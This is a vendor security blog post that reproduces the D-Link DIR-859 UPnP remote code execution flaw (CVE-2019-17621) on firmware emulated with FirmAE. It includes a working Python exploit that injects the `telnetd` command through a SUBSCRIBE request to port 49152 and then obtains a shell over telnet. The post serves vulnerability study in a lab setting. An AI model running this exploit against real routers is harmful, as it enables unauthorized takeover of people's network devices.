提交需求
*
*

*
*
*
立即提交
点击”立即提交”,表明我理解并同意 《美创科技隐私条款》
免费试用
400-811-3777

logo

    产品与服务
    解决方案
    技术支持
    合作发展
    关于美创
    申请试用
      热门阅读
      1

      让数据流得动、用得好、更安全——美创可信数据空间解决方案正式发布

      2026-06-25

       2

      《金融信息服务数据分类分级指南》解读与美创数据安全分类分级落地实践

      2026-06-23

       3

      国家网信办、工业和信息化部、公安部联合公布《网络数据安全风险评估办法》

      2026-06-22

       4

      AI 驱动后渗透综合管理平台LeoAI部署与使用

      2026-06-18

       5

      美创科技端午节假期值班公告

      2026-06-18
      相关文章

      AI 驱动后渗透综合管理平台LeoAI部署与使用

      2026-06-18

      开源AI自主渗透智能体LuaN1aoAgent部署与使用

      2026-06-15

      开源AI原生安全测试平台CyberStrikeAI部署与使用

      2026-06-08

      开源AI渗透测试工具Cairn AI部署与使用

      2026-05-29

      从0到1:构建一个AI自动化未授权访问漏洞挖掘 Agent

      2026-05-25
      D-Link DIR-859 RCE漏洞(CVE-2019-17621)复现
      发布时间:2023-03-17 阅读次数: 1345 次
      环境搭建

      1.FirmAE 工具安装

      首先拉取FirmAE 工具仓库


      git clone --recursive https://github.com/pr0v3rbs/FirmAE

      图片

      运行下载脚本



      cd FirmAE/./download.sh

      图片

      运行./install.sh进行安装

      图片

      2.下载固件

      本文模拟的是设备型号为D-Link DIR-859

      下载地址:


      http://www.dlink.com.cn/techsupport/ProductInfo.aspx?m=DIR-859

      下载后得到DIR859Ax_FW105b03.bin固件文件

      图片

      3.FirmAE工具初始化

      FirmAE工具目录下执行./init.sh进行初始化

      图片

      4.安装binwalk

      这里使用FirmAE工具目录下的binwalk安装程序进行安装


      cd binwalk-2.3.3/python3 setup.py install

      图片

      5.模拟运行固件
      执行如下命令对固件进行解压


      binwalk -Me /root/DIR859_FW102b03.bin --run-as=root

      图片

      图片

      执行如下命令来模拟运行固件


      sudo ./run.sh -r DIR-859 /root/DIR859_FW102b03.bin

      图片

      使用浏览器访问http://192.168.0.1,出现如下界面则表明成功模拟了一台D-Link DIR-859路由器

      图片

      漏洞复现

      查看端口


      nmap 192.168.0.1

      图片

      使用49152端口

      EXP内容如下:




      import socketimport osfrom time import sleep
      def httpSUB(server, port, shell_file):    con = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    Payload = "SUBSCRIBE /gena.cgi?service=" + str(shell_file) + " HTTP/1.0\n"    Payload += "Host: " + str(server) + ":" + str(port) + "\n"    Payload += "Callback: <http://192.168.126.128:33/>\n"    Payload += "NT: upnp:event\n"    Payload += "Timeout: Second-1800\n"    Payload += "Accept-Encoding: gzip, deflate\n"    Payload += "User-Agent: gupnp-universal-cp GUPnP/1.0.2 DLNADOC/1.50\n\n"    print(Payload)    sleep(1)    print('[*] Sending Payload')    con.connect((socket.gethostbyname(server),port))    con.send(Payload.encode())    results = con.recv(4096)
          sleep(1)    print('[*] Running Telnetd Service')
      serverInput = raw_input('IP Router: ')portInput = 49152
      httpSUB(serverInput, portInput, '`telnetd`')

      执行EXP


      python poc.py

      图片

      使用nmap扫描可以看到已成功通过漏洞开启了telnetd服务


      nmap 192.168.0.1

      图片

      执行telnet 192.168.0.1,成功获取shell

      图片


      上一条:每周安全速递²⁵²|Lockbit声称窃取了SpaceX火箭供应商的3000份图纸
      下一条:【漏洞通告】Apache Dubbo反序列化漏洞(CVE-2023-23638)
      返回
      关注或联系美创
      官方订阅号 官方订阅号
      官方服务号 官方服务号
      第59号 第59号
      服务热线:400-811-3777
      商务合作:marketing@mchz.com.cn
      友情链接 中央网信办 公安部 工信部 CNCERT 中国信通院 中国软件测评中心 国家工业信息安全发展研究中心 赛迪研究院
      Copyright © 2024 杭州美创科技股份有限公司 All rights reserved.
      浙公网安备 33010502006954号 浙ICP备12021012号-1 网站地图 网站声明及隐私保护政策
      免费试用
      服务热线

      马上咨询

      400-811-3777

      回到顶部